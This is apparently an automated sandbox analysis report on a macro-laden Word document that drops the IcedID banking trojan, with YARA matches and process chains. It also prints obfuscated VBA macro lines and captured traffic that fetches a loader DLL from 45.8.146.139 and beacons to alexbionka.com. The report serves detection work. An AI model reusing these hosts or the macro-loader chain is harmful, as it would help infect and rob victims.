    Source: rundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Zf
    Source: rundll32.exe, 00000005.00000002.944123295.0000000000394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7180F76F-1528-4360-9534-25B0235971A3}.tmpJump to behavior
    Source: unknownDNS traffic detected: queries for: alexbionka.com
    Source: global trafficHTTP traffic detected: GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    System Summary

    barindex
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: Screenshot number: 12Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". wa ii: ^ 'rri Mp -
    Source: Screenshot number: 12Screenshot OCR: Enable content". wa ii: ^ 'rri Mp - m~ O 100% G) A GE)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group to collect intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdfhttps://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdfhttps://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800024FC
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Sub Document_Open()
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Sub Document_Open()
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A33 NtOpenProcessToken,NtClose,
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619E3 NtOpenProcessToken,NtSetInformationToken,NtClose,
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FE6 NtCreateSection,NtMapViewOfSection,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FF9 NtCreateSection,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: No import functions for PE file found
    Source: y875E.tmp.dll.1.drStatic PE information: No import functions for PE file found
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: courtesyautomotivedoc08.11.docOLE indicator, VBA macros: true
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77740000 page execute and read and write
    Source: courtesyautomotivedoc08.11.docVirustotal: Detection: 26%
    Source: courtesyautomotivedoc08.11.docReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: courtesyautomotivedoc08.11.LNK.1.drLNK file: ..\..\..\..\..\Desktop\courtesyautomotivedoc08.11.doc
    Source: courtesyautomotivedoc08.11.docOLE indicator, Word Document stream: true
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$urtesyautomotivedoc08.11.docJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6D91.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/14@2/2
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007614BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCommand line argument: RunDLL
    Source: courtesyautomotivedoc08.11.docOLE document summary: title field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: author field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: edited time not present or 0
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: title field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: author field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: edited time not present or 0
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: title field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: author field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: edited time not present or 0
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: courtesyautomotivedoc08.11.docInitial sample: OLE zip file path = docProps/custom.xml
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: courtesyautomotivedoc08.11.docStatic file information: File size 2351271 > 1048576
    Source: Binary string: rundll32.pdb source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619CA push ecx; ret
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7538BC2 push rax; ret
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF753610E push rdx; ret
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
    Source: y875E.tmp.dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
